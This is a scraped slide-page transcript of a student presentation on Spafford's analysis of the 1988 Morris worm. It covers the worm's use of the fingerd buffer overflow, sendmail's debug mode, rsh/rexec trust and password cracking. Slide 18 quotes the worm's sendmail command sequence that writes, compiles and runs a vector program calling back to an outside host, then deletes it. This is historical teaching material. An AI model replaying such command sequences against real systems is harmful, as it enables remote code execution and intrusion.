Presentation is loading. Please wait.

Presentation is loading. Please wait.

Crisis And Aftermath Eugene H. Spafford 이희범.  Introduction  How the worm operated  Aftermath Contents.

Published byRandolph Francis Modified over 9 years ago

Similar presentations

Presentation on theme: "Crisis And Aftermath Eugene H. Spafford 이희범.  Introduction  How the worm operated  Aftermath Contents."— Presentation transcript:

1 Crisis And Aftermath Eugene H. Spafford 이희범

2  Introduction  How the worm operated  Aftermath Contents

3 Introduction

4 Worm vs. Virus WormVirus Can run independently?YesNo How this operated?Consume the resource of its host Insert itself into a host’s some program When invoked?ItselfWhen infected program is running TargetSeveral systemsTarget machine

5  On the evening of November 2, 1988 MIT  Infect Sun 3 systems and VAX computer running variants of 4 BSD UNIX  Systems became so loaded that they were unable to continue any processing. Morris Worm

6  The worm took advantage of some flaws in standard software installed on UNIX. (fingerd, sendmail)  It also took advantage of a mechanism used to simplify the sharing of resources in local area networks (rsh, rexec) How the worm operated

7  finger : allows user to obtain information about other user over TPC(79)/IP Common Unix systems run a demon of finger (fingerd) The worm broke fingerd program by “buffer overflow” The worm exploited gets() (no bound checking) call Fingerd

8  sendmail is mailer program to route mail in a heterogeneous network.  By debug option, tester can run programs to display the state of the mail system without sending mail or establishing a separate login connection.  Worm uses debug option to invoke set of commands instead of user address Sendmail

9  rsh and rexec are remote command execution services.  rsh (client IP, user ID)  rexec (user ID, Password) rsh, rexec

10  Password mechanism in UNIX system 1. Insert password 2. “Encryption standard algorithm” encrypted 3. Compare with Previously encrypted password 4. If it is same, we get a accessibility Password

11  Multiple processor and processor speed up  Tendency of users to choose common words as their passwords  Ways to reduce the risk of such attacks Shadow file Time delay and Threshold Change utility Password

12  Main Program : collect information on other machines in the network and attack  Vector Program : Program which install main program Worm

13  Rsh – simply try and success cases Remote machine had a hosts.equiv file or The user had a.rhosts file  Rexec – if worm knows password Simply try Users often have the same password on their accounts on muiltiple machines Attack method(1)

14 1. Collect info /etc/hosts.equiv and /.rhosts /etc/passwd.forward 2. Cracking passwd using simple choices 3. Cracking passwd with an internal dictionary of words 4. Cracking passwd with /usr/dict/words Cracking Password

15  Fingerd – 1.connection 2. input 3. output Transmit specially constructed string of 536bytes Stack overflow attacking Change the return stack frame for main execve(“/bin/sh”, 0, 0) Attack method(2)

16  Sendmail Use debug mode Transmit command instead of recv address Attack method(3)

17  A socket was established  Magic number was generated  Random file name was generated Step 1

18 PATH=/bin: /usr/bin: /usr/ucb cd /usr/tmp echo gorch49; sed ‘/int zz/q’ > x14481910.c; echo gorch 50 [text of vector program] int zz; Debug mail from: rcpt to: data cd /usr/tmp cat > x14481910.c << ‘EOF’ [text of vector..] EOF cc –o x14481910 x14481910.c./x1448190 128.32.134.16 32341 8712440 rm –f x14481910 x14481910.c Quit Step 2

19  Vector connected to the ‘server’ Transfer 3 files Sun3, VAX binary version of worm Source code of Vector  Vector became a shell with its input, output still connected to the server Using execl Step 3

20  For each object files, the worm tries to build an executable object.  If successively execute, the worm kills the command interpreter and shuts down the connect  Otherwise it clear away all evidence of the attempt at infection Step 4

21  New worm hides itself Obscuring its argument vector Unlinking the binary version of itself Killing its parent Read worm binary into memory and encrypt And delete file from disk Step 5

22  The worm gathers information about Network interface Hosts to which the local machines was connected  Using ioctl, netstat  It built lists of these in memory Step 6

23  Tries to infect some from the list  Check reachability using telnet, rexec Step 7

24  Check for other worms running  One of 7 worms become immortal  Fork itself and kill parent Change pid, scheduling priority  Re-infect the same machine every 12 hours  No damaging code  There are no stop code Characteristics

25  First worm  Around 6000 major UNIX machines were infected ( 10% of the network at that time)  Important nation-wide gateways were shutdown  Topic debated punishment Aftermath

26  Robert T. Morris arrested  He just want to make a tool to gauge the size of the internet [Computer Fraud and Abuse Act 86] 3 years probation, fine, community service  Computer Emergency Response Team was established Aftermath(cont)

Download ppt "Crisis And Aftermath Eugene H. Spafford 이희범.  Introduction  How the worm operated  Aftermath Contents."

Similar presentations

Buffer Overflows Nick Feamster CS 6262 Spring 2009 (credit to Vitaly S. from UT for slides)

Buffer Overflows Nick Feamster CS 6262 Spring 2009 (credit to Vitaly S. from UT for slides)
Computer Science CSC 405Dr. Peng Ning1 CSC 405 Introduction to Computer Security Topic 3. Program Security -- Part I.

Computer Science CSC 405Dr. Peng Ning1 CSC 405 Introduction to Computer Security Topic 3. Program Security -- Part I.
Slide 2-1 Copyright © 2004 Pearson Education, Inc. Operating Systems: A Modern Perspective, Chapter 2 Using the Operating System 2.

Slide 2-1 Copyright © 2004 Pearson Education, Inc. Operating Systems: A Modern Perspective, Chapter 2 Using the Operating System 2.
C risis And A ftermath Eugene H. Spafford 발표자 : 손유민.

C risis And A ftermath Eugene H. Spafford 발표자 : 손유민.
Communications of the ACM (CACM), Vol. 32, No. 6, June 1989

Communications of the ACM (CACM), Vol. 32, No. 6, June 1989
Lecture: Malicious Code CIS 3360 Ratan K. Guha. Malicious Code2 Overview and Reading Assignments Defining malicious logic Types Action by Viruses Reading.

Lecture: Malicious Code CIS 3360 Ratan K. Guha. Malicious Code2 Overview and Reading Assignments Defining malicious logic Types Action by Viruses Reading.
Utilizing the GDB debugger to analyze programs Background and application.

Utilizing the GDB debugger to analyze programs Background and application.
CSE331: Introduction to Networks and Security Lecture 32 Fall 2002.

CSE331: Introduction to Networks and Security Lecture 32 Fall 2002.
Using tcpdump. tcpdump is a powerful tool that allows us to sniff network packets and make some statistical analysis out of those dumps. tcpdump operates.

Using tcpdump. tcpdump is a powerful tool that allows us to sniff network packets and make some statistical analysis out of those dumps. tcpdump operates.
October 15, 2002Serguei A. Mokhov, 1 UNIX Security 2: A Quick Recap SOEN321 - Information Systems Security Revision 1.3 Date: September.

October 15, 2002Serguei A. Mokhov, 1 UNIX Security 2: A Quick Recap SOEN321 - Information Systems Security Revision 1.3 Date: September.
Telnet and FTP. Telnet Lets you use the resources of some other computer on the Internet to access files, run programs, etc. Creates interactive connection.

Telnet and FTP. Telnet Lets you use the resources of some other computer on the Internet to access files, run programs, etc. Creates interactive connection.
Silberschatz, Galvin and Gagne  2002 19.1 Operating System Concepts The Security Problem A system is secure iff its resources are used and accessed as.

Silberschatz, Galvin and Gagne  Operating System Concepts The Security Problem A system is secure iff its resources are used and accessed as.
Secure Shell – SSH Tam Ngo Steve Licking cs265. Overview Introduction Brief History and Background of SSH Differences between SSH-1 and SSH- 2 Brief Overview.

Secure Shell – SSH Tam Ngo Steve Licking cs265. Overview Introduction Brief History and Background of SSH Differences between SSH-1 and SSH- 2 Brief Overview.
Security A system is secure if its resources are used and accessed as intended under all circumstances. It is not generally possible to achieve total security.

Security A system is secure if its resources are used and accessed as intended under all circumstances. It is not generally possible to achieve total security.
Eugene H. Spafford, The Internet Worm Program: An Analysis Presented by Petko Bakalov University of California - Riverside

Eugene H. Spafford, "The Internet Worm Program: An Analysis" Presented by Petko Bakalov University of California - Riverside
Introducing the Command Line CMSC 121 Introduction to UNIX Much of the material in these slides was taken from Dan Hood’s CMSC 121 Lecture Notes.

Introducing the Command Line CMSC 121 Introduction to UNIX Much of the material in these slides was taken from Dan Hood’s CMSC 121 Lecture Notes.
CSCE 515: Computer Network Programming Chin-Tser Huang University of South Carolina.

CSCE 515: Computer Network Programming Chin-Tser Huang University of South Carolina.
The Internet Worm Crisis and Aftermath Miyu Nakagawa Cameron Smithers Ying Han.

The Internet Worm Crisis and Aftermath Miyu Nakagawa Cameron Smithers Ying Han.
Working Environment - - Linux - -.

Working Environment - - Linux - -.
SSH : The Secure Shell By Rachana Maheswari CS265 Spring 2003.

SSH : The Secure Shell By Rachana Maheswari CS265 Spring 2003.

Similar presentations

Ads by Google